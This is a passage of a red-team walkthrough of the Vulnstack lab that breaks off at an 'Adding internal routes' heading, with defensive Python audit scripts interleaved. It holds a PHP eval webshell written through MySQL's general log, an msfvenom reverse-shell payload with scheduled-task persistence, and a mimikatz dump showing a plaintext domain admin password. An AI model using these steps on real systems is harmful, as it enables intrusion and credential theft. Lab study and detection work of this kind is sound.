
Vulnstack Red Team (1)

The target is the lab environment shared by Hongri Security (红日安全).
Download: http://vulnstack.qiyuanxuetang/vuln/detail/2/
References used for these notes:
CSDN: 谢公子
FreeBuf: Hongri Security team column
CSDN: assless

This exercise uses two virtual networks:
192.168.72.0/24 simulates the public internet (Vmnet2).
192.168.52.0/24 simulates the internal network (Vmnet1).

The attacker machine and the first NIC of the Win7 host are on Vmnet1 (simulated public network).
The second NIC of Win7 shares Vmnet1 with win2k3 and win2k8 (simulated internal network).

First, verify that the segments, and the hosts within each segment, can communicate normally.
Note: while the Win7 firewall is still enabled, Win7 can reach the other machines, but the other machines cannot ping Win7.

Planned steps:

  1. Information gathering;

  2. Exploitation;

  3. Lateral movement in the internal network;

    3.1 internal information gathering;
    3.2 exploitation inside the internal network.

  4. Report and summary. (not included in these notes)

Information gathering

Step one: discover live hosts with Nmap:

nmap -sU --script nbstat.nse -p137 192.168.72.0/24 -T4

From the results:

root@AnranNewKali001:~#  nmap -sU --script nbstat.nse -p137 192.168.72.0/24 -T4
Starting Nmap 7.80 ( https://nmap ) at 2020-05-30 22:58 CST
Nmap scan report for 192.168.72.1
Host is up (0.00023s latency).

PORT    STATE SERVICE
137/udp open  netbios-ns
MAC Address: 00:50:56:C0:00:0C (VMware)

Host script results:
| nbstat: NetBIOS name: DESKTOP-MMVB7A9, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:c0:00:0c (VMware)
| Names:
|   DESKTOP-MMVB7A9<20>  Flags: <unique><active>
|   DESKTOP-MMVB7A9<00>  Flags: <unique><active>
|_  STUDYGROUP<00>       Flags: <group><active>

Nmap scan report for 192.168.72.129
Host is up (0.00057s latency).

PORT    STATE SERVICE
137/udp open  netbios-ns
MAC Address: 00:0C:29:C4:33:DF (VMware)

Host script results:
| nbstat: NetBIOS name: STU1, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:c4:33:df (VMware)
| Names:
|   STU1<20>             Flags: <unique><active>
|   STU1<00>             Flags: <unique><active>
|   GOD<00>              Flags: <group><active>
|   GOD<1e>              Flags: <group><active>
|   GOD<1d>              Flags: <unique><active>
|_  \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>

Nmap scan report for 192.168.72.254
Host is up (0.00013s latency).

PORT    STATE         SERVICE
137/udp open|filtered netbios-ns
MAC Address: 00:50:56:E6:D6:C6 (VMware)

Nmap scan report for 192.168.72.128
Host is up (0.00015s latency).

PORT    STATE  SERVICE
137/udp closed netbios-ns

Nmap done: 256 IP addresses (4 hosts up) scanned in 32.49 seconds
root@AnranNewKali001:~# nmap -Pn 192.168.72.129
Starting Nmap 7.80 ( https://nmap ) at 2020-05-31 09:18 CST
Nmap done: 1 IP address (0 hosts up) scanned in 0.50 seconds


The host exposed to the external network is 192.168.72.129.
Use Nmap to scan its open ports:

root@AnranNewKali001:~# nmap -sC -sV -Pn -p 1-65535 192.168.72.129
Starting Nmap 7.80 ( https://nmap ) at 2020-05-31 09:21 CST
Stats: 0:02:54 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.93% done; ETC: 09:24 (0:00:00 remaining)
Nmap scan report for 192.168.72.129
Host is up (0.00089s latency).
Not shown: 65524 closed ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
|_http-title: phpStudy \xE6\x8E\xA2\xE9\x92\x88 2014 
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: GOD)
1025/tcp  open  msrpc        Microsoft Windows RPC
1026/tcp  open  msrpc        Microsoft Windows RPC
1027/tcp  open  msrpc        Microsoft Windows RPC
1028/tcp  open  msrpc        Microsoft Windows RPC
1031/tcp  open  msrpc        Microsoft Windows RPC
3306/tcp  open  mysql        MySQL (unauthorized)
48478/tcp open  msrpc        Microsoft Windows RPC
MAC Address: 00:0C:29:C4:33:DF (VMware)
Service Info: Host: STU1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: STU1, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:c4:33:df (VMware)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-05-31T01:23:41
|_  start_date: 2020-05-30T14:30:21

Service detection performed. Please report any incorrect results at https://nmap/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 179.49 seconds

Ports 80, 139 and 445 are the ones worth testing.
There are two directions: the web service, and exploitation with msf.
A directory scan with 御剑 (Yujian) or a similar tool can follow.
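The scan above reports `message_signing: disabled` for the Win7 host, which is the finding a defender would want pulled out of a scan automatically. The following added example (not code from the original write-up) parses nmap's normal text output for the smb-security-mode and smb2-security-mode script results and lists hosts where signing is not enforced. The sample text is constructed from the two scans in this post.

```python
"""Added example (not from the original write-up): extract SMB signing
state from saved nmap text output and flag hosts where it is not enforced.
SAMPLE_NMAP_OUTPUT is constructed from the scans of 192.168.72.129 and the
DC 192.168.52.138 shown in this post."""
import re

SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 192.168.72.129
Host is up (0.00089s latency).
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: GOD)
Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
Nmap scan report for 192.168.52.138
Host is up (0.0027s latency).
445/tcp   open  microsoft-ds (primary domain: GOD)
Host script results:
| smb-security-mode:
|   account_used: guest
|_  message_signing: required
|_smbv2-enabled: Server supports SMBv2 protocol
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
SMB1_RE = re.compile(r"^message_signing:\s*(\w+)")       # smb-security-mode line
SMB2_RE = re.compile(r"^Message signing (.+)$")          # smb2-security-mode line


def parse_smb_signing(text):
    """Map each host to its SMB1 and SMB2 signing state (None if not reported)."""
    hosts = {}
    current = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = m.group(1)
            hosts[current] = {"smb1": None, "smb2": None}
            continue
        if current is None:
            continue
        # NSE script output is prefixed with "| ", "|_ " and indentation
        body = line.lstrip("|_ ")
        m = SMB1_RE.match(body)
        if m:
            hosts[current]["smb1"] = m.group(1)
            continue
        m = SMB2_RE.match(body)
        if m:
            hosts[current]["smb2"] = m.group(1).strip()
    return hosts


def signing_findings(hosts):
    """One line per host where SMB signing is not required (NTLM relay exposure)."""
    findings = []
    for host, modes in sorted(hosts.items()):
        if modes["smb1"] is not None and modes["smb1"] != "required":
            findings.append(f"{host}: SMB1 signing {modes['smb1']}")
        if modes["smb2"] is not None and "not required" in modes["smb2"]:
            findings.append(f"{host}: SMB2 signing {modes['smb2']}")
    return findings


if __name__ == "__main__":
    for line in signing_findings(parse_smb_signing(SAMPLE_NMAP_OUTPUT)):
        print(line)
```

Only the Win7 host is reported; the DC already requires signing. The fix for the workstation is the Group Policy setting "Microsoft network server: Digitally sign communications (always)", after which both script results read "required".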

Exploitation

Writing a webshell backdoor
phpMyAdmin and yxcms were found on the site.

Method one: write a shell through MySQL

phpMyAdmin can write a shell through the MySQL general log.
The database has a weak credential:
root
root

show variables like '%general%';   # check the general log status
SET GLOBAL general_log='on';       # enable general_log
SET GLOBAL general_log_file='C:/phpstudy/www/yxcms/backdoor.php';   # point the log file into the web root
SELECT "<?PHP @EVAL($_POST['zyx']);?>";   # one-line webshell, recorded into the log file



Once done, connect with 蚁剑 (AntSword).
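The general_log route works because the MySQL service account can write into the web root and root/root grants the SUPER privilege needed to change general_log_file. The following added example (not from the original write-up) audits the SHOW VARIABLES state for exactly that condition; the variable rows and the phpStudy web root C:\phpstudy\www are constructed assumptions mirroring this lab.

```python
"""Added example (not from the original write-up): check the MySQL settings
that decide whether a database account can drop a file into the web root,
which is what the general_log trick above relies on. The variable rows are
constructed to mirror this lab; on a real server feed the function the rows
returned by SHOW VARIABLES."""
from pathlib import PureWindowsPath

WEB_ROOT = r"C:\phpstudy\www"   # assumption: phpStudy default document root

# Constructed: state after the write-up's SET GLOBAL commands
SAMPLE_VARIABLES = [
    ("general_log", "ON"),
    ("general_log_file", "C:/phpstudy/www/yxcms/backdoor.php"),
    ("secure_file_priv", ""),          # empty string: INTO OUTFILE may write anywhere
    ("log_output", "FILE"),
]

# Constructed: the same server after hardening my.ini
HARDENED_VARIABLES = [
    ("general_log", "OFF"),
    ("general_log_file", r"C:\phpstudy\MySQL\data\stu1.log"),
    ("secure_file_priv", "NULL"),      # MySQL reports NULL when file export is disabled
    ("log_output", "FILE"),
]


def is_under(path, root):
    """True when path lies inside root; case-insensitive, either slash style."""
    p = [part.lower() for part in PureWindowsPath(path).parts]
    r = [part.lower() for part in PureWindowsPath(root).parts]
    return len(p) > len(r) and p[: len(r)] == r


def audit_mysql_file_write(variables, web_root=WEB_ROOT):
    """Return findings for settings that let attacker-chosen content land under the web root."""
    v = {name: value for name, value in variables}
    findings = []
    if v.get("general_log", "OFF").upper() == "ON":
        log_file = v.get("general_log_file", "")
        if is_under(log_file, web_root):
            findings.append(f"general_log_file is inside the web root: {log_file}")
        else:
            findings.append("general_log is ON; every query is written to disk")
    if v.get("secure_file_priv", "") == "":
        findings.append("secure_file_priv is empty: SELECT ... INTO OUTFILE can write to any path")
    return findings


if __name__ == "__main__":
    print(audit_mysql_file_write(SAMPLE_VARIABLES))   # two findings
    print(audit_mysql_file_write(HARDENED_VARIABLES)) # []
```

Note that secure_file_priv only restricts INTO OUTFILE / LOAD DATA; it does not stop a SUPER user from redirecting general_log_file. The controls that actually close this path are not exposing phpMyAdmin with a root/root credential and running mysqld under an account that has no write access to the document root.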

Method two: start from yxcms
The default password still works, so log in to the admin backend.

In the backend, the default template can be edited.

Save it and test with AntSword.

Internal information gathering

Generating a backdoor with msf
Generate a backdoor with msf, upload it with AntSword, and add a scheduled task to run it.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.72.128 LPORT=10086 -e x86/shikata_ga_nai -i 5 -f exe -o /root/backdoor.exe

Adding a scheduled task on Windows

schtasks /create /tn solrindex /tr C:\backdoor.exe /sc minute /mo 1   # create task "solrindex" that runs every minute
schtasks /delete /tn solrindex /F                                      # delete the task

Reference: CSDN: assless

After the task is added, start a listener in msf:

msf5 > use multi/handler
# choose and set the payload to match the one used when generating the backdoor
msf5 exploit(multi/handler) > set payload windows/shell_reverse_tcp
# when the scheduled task fires, msf receives a session
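The persistence just described leaves a very recognisable artefact: a task whose action points at a binary in a user-writable location, repeating every minute. The following added example (not from the original write-up) triages a task definition for that pattern. The input format is the task XML that `schtasks /query /xml` prints and that Security event 4698 ("A scheduled task was created") carries in its TaskContent field; both task samples below are constructed.

```python
"""Added example (not from the original write-up): triage a scheduled task
definition for the persistence pattern above (a binary outside the system
directories, re-run every minute, as SYSTEM). Input is task XML as printed
by `schtasks /query /xml` or carried in Security event 4698. Both samples
are constructed."""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# Constructed: roughly what the write-up's schtasks /create command registers
SUSPICIOUS_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>GOD\Administrator</Author></RegistrationInfo>
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT1M</Interval></Repetition>
      <StartBoundary>2020-05-31T20:12:47</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal>
  </Principals>
  <Actions Context="Author"><Exec><Command>C:\backdoor.exe</Command></Exec></Actions>
</Task>"""

# Constructed: an ordinary daily maintenance task for comparison
BENIGN_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2020-05-31T03:00:00</StartBoundary>
      <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Principals><Principal id="Author"><UserId>GOD\ligang</UserId></Principal></Principals>
  <Actions Context="Author"><Exec><Command>C:\Windows\System32\wevtutil.exe</Command></Exec></Actions>
</Task>"""

DURATION_RE = re.compile(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?")


def iso_duration_seconds(text):
    """Convert the ISO 8601 durations used in task XML (PT1M, PT1H30M, P1D) to seconds."""
    m = DURATION_RE.fullmatch(text.strip())
    if not m:
        raise ValueError(f"unsupported duration: {text}")
    days, hours, minutes, seconds = (int(x) if x else 0 for x in m.groups())
    return days * 86400 + hours * 3600 + minutes * 60 + seconds


def triage_task(xml_text, min_interval=300):
    """Return findings for one task definition; an empty list means nothing stood out."""
    root = ET.fromstring(xml_text)
    findings = []
    # 1. action binary outside the system directories
    for cmd in root.iterfind(".//t:Actions/t:Exec/t:Command", NS):
        raw = (cmd.text or "").strip().strip('"')
        if not raw.lower().startswith(TRUSTED_DIRS):
            findings.append(f"command outside trusted directories: {raw}")
    # 2. tight repetition interval (the write-up uses one minute)
    for interval in root.iterfind(".//t:Repetition/t:Interval", NS):
        secs = iso_duration_seconds(interval.text or "")
        if secs < min_interval:
            findings.append(f"repeats every {secs}s")
    # 3. runs as LocalSystem
    for uid in root.iterfind(".//t:Principals/t:Principal/t:UserId", NS):
        if (uid.text or "").strip().upper() in ("S-1-5-18", "SYSTEM", "NT AUTHORITY\\SYSTEM"):
            findings.append("runs as SYSTEM")
    return findings


if __name__ == "__main__":
    print(triage_task(SUSPICIOUS_TASK_XML))   # three findings
    print(triage_task(BENIGN_TASK_XML))       # []
```

Event 4698 is only written when "Audit Other Object Access Events" is enabled in the advanced audit policy; without it, the same triage can be run periodically over the output of `schtasks /query /xml` on each host.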

Privilege escalation and securing the foothold
After `background` saves the session, `sessions -u 1` upgrades session 1 to meterpreter and saves it as session 2.

In meterpreter, use getsystem to escalate.

Then migrate into another process (prefer a 64-bit one):

migrate pid

Dumping passwords

If meterpreter output is garbled, `chcp 65001` fixes it.
Then load mimikatz.

meterpreter > load mimikatz
meterpreter > help mimikatz

Mimikatz Commands
=================

    Command           Description
    -------           -----------
    kerberos          Attempt to retrieve kerberos creds.
    livessp           Attempt to retrieve livessp creds.
    mimikatz_command  Run a custom command.
    msv               Attempt to retrieve msv creds (hashes).
    ssp               Attempt to retrieve ssp creds.
    tspkg             Attempt to retrieve tspkg creds.
    wdigest           Attempt to retrieve wdigest creds.
meterpreter > wdigest 
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================

AuthID     Package    Domain        User           Password
------     -------    ------        ----           --------
0;997      Negotiate  NT AUTHORITY  LOCAL SERVICE  
0;51993    NTLM                                    
0;2492365  Kerberos   GOD           Administrator  hongrisec@2019
0;996      Negotiate  GOD           STU1$          df ee 90 18 9c 48 2d 8a e9 98 49 06 01 ca d4 7f 79 c8 19 1f ab e2 63 50 2f 54 c9 08 09 3f f0 49 82 94 6c b1 86 bb 44 57 7c 39 76 46 03 78 c3 e1 a5 74 02 f8 9c 81 b2 5a 12 e5 01 b1 53 18 ed 2c 6d 0f 71 dd 7c 7c 00 8a e7 51 56 5c 3a 11 3a 18 b2 f8 58 b4 08 0d 20 ca b8 00 72 27 be 71 d6 42 9d fb 13 d0 f8 fb f4 5a af 45 af 87 d7 20 cc 4e 68 c9 f9 67 c0 a9 7d 75 66 88 0c 8c 05 c5 88 1a bd a9 79 5b 63 cd a7 3d 19 9b 4d 93 ce 61 b9 68 39 9b 8b bd 53 2e 28 6b 5b 55 21 ee 2e 61 59 b5 4c 77 49 0e eb cc 92 31 94 5f 3a 0d d5 61 8f 1f 38 75 0e 70 bd fc 99 94 a3 80 95 49 b0 b0 84 e5 c6 0a 60 d7 52 ac 25 52 2a 62 f8 e3 8b 2a 72 b2 53 8d eb f0 ce e6 cf 0d 7a 4b 3b 03 4d 6e 74 bb d1 8d 71 32 31 1c 4f 9e b6 f4 85 d8 0d 4b b6 03
0;999      Negotiate  GOD           STU1$          df ee 90 18 9c 48 2d 8a e9 98 49 06 01 ca d4 7f 79 c8 19 1f ab e2 63 50 2f 54 c9 08 09 3f f0 49 82 94 6c b1 86 bb 44 57 7c 39 76 46 03 78 c3 e1 a5 74 02 f8 9c 81 b2 5a 12 e5 01 b1 53 18 ed 2c 6d 0f 71 dd 7c 7c 00 8a e7 51 56 5c 3a 11 3a 18 b2 f8 58 b4 08 0d 20 ca b8 00 72 27 be 71 d6 42 9d fb 13 d0 f8 fb f4 5a af 45 af 87 d7 20 cc 4e 68 c9 f9 67 c0 a9 7d 75 66 88 0c 8c 05 c5 88 1a bd a9 79 5b 63 cd a7 3d 19 9b 4d 93 ce 61 b9 68 39 9b 8b bd 53 2e 28 6b 5b 55 21 ee 2e 61 59 b5 4c 77 49 0e eb cc 92 31 94 5f 3a 0d d5 61 8f 1f 38 75 0e 70 bd fc 99 94 a3 80 95 49 b0 b0 84 e5 c6 0a 60 d7 52 ac 25 52 2a 62 f8 e3 8b 2a 72 b2 53 8d eb f0 ce e6 cf 0d 7a 4b 3b 03 4d 6e 74 bb d1 8d 71 32 31 1c 4f 9e b6 f4 85 d8 0d 4b b6 03

The Administrator password was obtained.

Identifying the networks
Simulated public network: 192.168.72.0/24
Simulated internal network: 192.168.52.0/24

Identifying domain information
net time /domain        # query the time server; the primary domain controller usually acts as time server
net user /domain        # list domain users
net view /domain        # list domains
ipconfig /all           # local IP ranges, domain membership, etc.
net config Workstation  # computer name, full name, user name, OS version, workstation domain, logon domain
net user                # local user list
net group "domain computers" /domain   # all computer names in the domain
net group "domain admins" /domain      # domain administrators
net group "domain controllers" /domain # domain controllers
net localgroup administrators          # local administrators (usually includes domain users); the run below fails because it was typed as "localhroup"
net user <username> /domain            # account details for a given user
net group /domain                      # groups in the domain
net group <groupname> /domain          # a specific domain group



C:\Windows\system32>ipconfig /all
ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : stu1
   Primary Dns Suffix  . . . . . . . : god.org
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : god.org
                                       localdomain

Ethernet adapter 本地连接 4:

   Connection-specific DNS Suffix  . : localdomain
   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection #2
   Physical Address. . . . . . . . . : 00-0C-29-51-92-E5
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::d527:9f93:47b9:c7ae%25(Preferred) 
   IPv4 Address. . . . . . . . . . . : 192.168.72.130(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Lease Obtained. . . . . . . . . . : 2020年5月31日 20:12:47
   Lease Expires . . . . . . . . . . : 2020年5月31日 21:27:48
   Default Gateway . . . . . . . . . : 
   DHCP Server . . . . . . . . . . . : 192.168.72.254
   DHCPv6 IAID . . . . . . . . . . . : 721423401
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-24-F3-A2-4E-00-0C-29-A7-C1-A8
   DNS Servers . . . . . . . . . . . : 192.168.72.1
   NetBIOS over Tcpip. . . . . . . . : Enabled

Ethernet adapter Npcap Loopback Adapter:

   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Npcap Loopback Adapter
   Physical Address. . . . . . . . . : 02-00-4C-4F-4F-50
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::b461:ccad:e30f:81ba%24(Preferred) 
   Autoconfiguration IPv4 Address. . : 169.254.129.186(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 
   DHCPv6 IAID . . . . . . . . . . . : 268566604
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-24-F3-A2-4E-00-0C-29-A7-C1-A8
   DNS Servers . . . . . . . . . . . : fec0:0:0:ffff::1%1
                                       fec0:0:0:ffff::2%1
                                       fec0:0:0:ffff::3%1
   NetBIOS over Tcpip. . . . . . . . : Enabled

Ethernet adapter 本地连接 3:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : TAP-Windows Adapter V9 #2
   Physical Address. . . . . . . . . : 00-FF-56-0B-EA-FC
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes

Ethernet adapter 本地连接 2:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : TAP-Windows Adapter V9
   Physical Address. . . . . . . . . : 00-FF-44-8D-CB-B5
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes

Ethernet adapter Bluetooth 网络连接:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Bluetooth 设备(个人区域网)
   Physical Address. . . . . . . . . : 90-78-41-5E-DD-FE
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes

Ethernet adapter 本地连接:

   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
   Physical Address. . . . . . . . . : 00-0C-29-51-92-DB
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::9522:e298:7366:33d9%11(Preferred) 
   IPv4 Address. . . . . . . . . . . : 192.168.52.143(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.52.2
   DHCPv6 IAID . . . . . . . . . . . : 234884137
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-24-F3-A2-4E-00-0C-29-A7-C1-A8
   DNS Servers . . . . . . . . . . . : 192.168.52.138
                                       8.8.8.8
   NetBIOS over Tcpip. . . . . . . . : Enabled

Tunnel adapter isatap.{4DAEBDFD-0177-4691-8243-B73297E2F0FF}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

Tunnel adapter isatap.localdomain:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : localdomain
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

Tunnel adapter isatap.{448DCBB5-7D61-4538-9C03-66B5CDAD1222}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter #3
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

Tunnel adapter isatap.{EC57C4EB-763E-4000-9CDE-4D7FF15DF74C}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter #4
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

Tunnel adapter isatap.{560BEAFC-DAC4-4687-A564-57790875DC43}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter #5
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

Tunnel adapter isatap.{43AF3215-AAB6-4AA1-B776-739F7D787259}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter #6
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

The fifth command (net config Workstation) fails under meterpreter; it can be run from AntSword instead.

C:\Windows\system32>net time /domain
net time /domain
Current time at \\owa.god.org is 2020/5/31 21:19:39

The command completed successfully.


C:\Windows\system32>net user /domain
net user /domain
The request will be processed at a domain controller for domain god.org.


User accounts for \\owa.god.org

-------------------------------------------------------------------------------
Administrator            Guest                    krbtgt                   
ligang                   liukaifeng01             
The command completed with one or more errors.


C:\Windows\system32>net view /domain
net view /domain
Domain

-------------------------------------------------------------------------------
GOD                  
The command completed successfully.


C:\Windows\system32>net config Workstation
net config Workstation
System error 1312 has occurred.

A specified logon session does not exist. It may already have been terminated.




C:\> net config Workstation
计算机名                     \\STU1
计算机全名                   stu1.god.org
用户名                       Administrator
工作站正运行于               
    NetBT_Tcpip_{4DAEBDFD-0177-4691-8243-B73297E2F0FF} (000C295192DB)
    NetBT_Tcpip_{55ECD929-FBB2-4D96-B43D-8FFEB14A169F} (000C295192E5)
    NetBT_Tcpip_{EC57C4EB-763E-4000-9CDE-4D7FF15DF74C} (02004C4F4F50)
软件版本                     Windows 7 Professional
工作站域                     GOD
工作站域 DNS 名称            god.org
登录域                       GOD
COM 打开超时 ()            0
COM 发送计数 (字节)          16
COM 发送超时 (毫秒)          250
命令成功完成。

C:\Windows\system32>net group "domain controllers" /domain
net group "domain controllers" /domain
The request will be processed at a domain controller for domain god.org.

Group name     Domain Controllers
Comment        域中所有域控制器

Members

-------------------------------------------------------------------------------
OWA$                     
The command completed successfully.


C:\Windows\system32>net group "domain admins" /domain
net group "domain admins" /domain
The request will be processed at a domain controller for domain god.org.

Group name     Domain Admins
Comment        指定的域管理员

Members

-------------------------------------------------------------------------------
Administrator            OWA$                     
The command completed successfully.


C:\Windows\system32>net group "domain computers" /domain
net group "domain computers" /domain
The request will be processed at a domain controller for domain god.org.

Group name     Domain Computers
Comment        加入到域中的所有工作站和服务器

Members

-------------------------------------------------------------------------------
DEV1$                    ROOT-TVI862UBEH$         STU1$                    
The command completed successfully.


C:\Windows\system32>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Guest                    liukaifeng01             
The command completed with one or more errors.



C:\Windows\system32>net localhroup administrators
net localhroup administrators
The syntax of this command is:

NET
    [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
      HELPMSG | LOCALGROUP | PAUSE | SESSION | SHARE | START |
      STATISTICS | STOP | TIME | USE | USER | VIEW ]

C:\Windows\system32>net view
net view
Server Name            Remark

-------------------------------------------------------------------------------
\\OWA                                                                          
\\ROOT-TVI862UBEH                                                              
The command completed successfully.

Summary of the gathered information:

Domain: god
Three domain users: Administrator, ligang, liukaifeng01
Three domain hosts: ROOT-TVI862UBEH (192.168.52.141), STU1 (Win7), OWA
Domain controller: OWA (192.168.52.138)
Win7 internal IP: 192.168.52.143
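The `net group "domain admins" /domain` listing above shows the computer account OWA$ alongside Administrator; by default a domain controller's machine account is not a member of Domain Admins, so that is exactly the kind of membership an administrator should review. The following added example (not from the original write-up) parses `net group` output and compares the members against an approved baseline; the sample listings are taken from this lab's output and the baseline is a constructed assumption.

```python
"""Added example (not from the original write-up): parse `net group <group>
/domain` output and flag members that do not belong in a privileged group.
SAMPLE_DOMAIN_ADMINS and SAMPLE_DOMAIN_COMPUTERS reproduce listings from this
lab; APPROVED_DOMAIN_ADMINS is a constructed baseline."""

SAMPLE_DOMAIN_ADMINS = """\
Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator            OWA$
The command completed successfully.
"""

SAMPLE_DOMAIN_COMPUTERS = """\
Group name     Domain Computers
Comment        All workstations and servers joined to the domain

Members

-------------------------------------------------------------------------------
DEV1$                    ROOT-TVI862UBEH$         STU1$
The command completed successfully.
"""

APPROVED_DOMAIN_ADMINS = {"Administrator"}   # constructed baseline for this lab


def parse_net_group(text):
    """Return (group name, member list) from `net group <name> /domain` output."""
    name, members, in_members = None, [], False
    for line in text.splitlines():
        if line.startswith("Group name"):
            name = line[len("Group name"):].strip()
        elif line.startswith("----"):
            in_members = True             # the dashed rule precedes the member columns
        elif line.startswith("The command"):
            break
        elif in_members and line.strip():
            members.extend(line.split())  # net prints up to three names per row
    return name, members


def audit_group(text, approved):
    """Flag computer accounts and anything outside the approved baseline."""
    name, members = parse_net_group(text)
    findings = []
    for member in members:
        if member.endswith("$"):
            findings.append(f"{name}: computer account {member} is a member")
        elif member not in approved:
            findings.append(f"{name}: {member} is not in the approved list")
    return findings


if __name__ == "__main__":
    for line in audit_group(SAMPLE_DOMAIN_ADMINS, APPROVED_DOMAIN_ADMINS):
        print(line)
```

The column split relies on account names having no spaces, which holds for the sAMAccountNames `net group` prints; for groups that are nested or very large, Get-ADGroupMember -Recursive gives a more reliable listing than parsing console output.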

Adding internal routes

